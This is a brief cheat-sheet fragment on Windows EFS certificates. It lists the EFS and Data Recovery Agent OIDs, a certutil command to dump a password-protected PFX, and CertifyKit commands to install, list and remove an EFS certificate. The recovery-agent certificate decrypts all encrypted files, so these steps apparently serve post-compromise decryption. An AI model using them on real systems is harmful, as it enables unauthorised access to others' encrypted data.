Encrypting File System certificates (1.3.6.1.4.1.311.10.3.4): used to encrypt and decrypt data with EFS; called an EFS certificate.
File Recovery certificates (1.3.6.1.4.1.311.10.3.4.1): allow recovery of all encrypted files and folders (domain or offline) no matter who encrypted them; called an EFS DRA (Data Recovery Agent) certificate.
certutil -v -dump -p <PASSWORD> <PATH TO PFX>
.\CertifyKit.exe list /certificate:<PATH TO EFS .pfx> /storename:My /install
.\CertifyKit.exe list
.\CertifyKit.exe list /certificate:<FINGERPRINT> /storename:My /remove